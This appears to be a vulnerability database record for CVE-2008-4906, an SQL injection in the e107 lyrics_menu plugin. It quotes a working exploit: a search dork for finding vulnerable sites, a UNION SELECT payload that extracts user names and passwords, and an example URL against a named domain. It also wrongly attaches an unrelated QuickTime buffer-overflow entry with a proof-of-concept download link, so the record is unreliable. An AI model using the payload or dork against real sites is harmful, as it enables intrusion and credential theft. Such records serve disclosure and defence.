CVE-2008-4906
Published: 2008-11-04
Priority P341 | high | 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.15% (62.7th percentile)
SQL injection vulnerability in lyrics_song.php in the Lyrics (lyrics_menu) plugin 0.42 for e107 allows remote attackers to execute arbitrary SQL commands via the l_id parameter. NOTE: some of these details are obtained from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| w1n78 | lyrics | — | — |
No detection rules found.
Exploit-DB
e107 Plugin lyrics_menu - 'l_id' SQL Injection
exploitdb·2008-10-31
CVE-2008-4906 e107 Plugin lyrics_menu - 'l_id' SQL Injection
---
e107 Plugin lyrics_menu lyrics_song.php (l_id) Remote Sql inj
author: ZoRLu
home: z0rlu.blogspot.com
concat: [email protected]
date: 30/10/2008 ( time 23:36, I'm at the_k@m!l's, a.q :) )
n0te: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
n0te: a.q kpss : ) )
dork: allinurl:"lyrics_menu/lyrics_song.php?l_id="
exploit:
http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2]
[SQL1] = column number 15
-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user--
example 1:
http://www.mirage.org/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_user--
[SQL2] = column number 17
-1+
Exploit-DB
QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow
exploitdb·2008-01-14
CVE-2008-0234 QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow
---
Quicktime Player 7.3.1.70 rtsp Remote Buffer Overflow Exploit PoC
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/4906.zip (2008-quicktimebof.zip)
# milw0rm.com [2008-01-14]
No writeups or analysis indexed.
http://secunia.com/advisories/32477
http://securityreason.com/securityalert/4551
http://www.securityfocus.com/bid/32004
http://z0rlu.blogspot.com/2008/10/e107-plugin-lyricsmenu-lyricssongphp.html
https://exchange.xforce.ibmcloud.com/vulnerabilities/46236
https://www.exploit-db.com/exploits/6885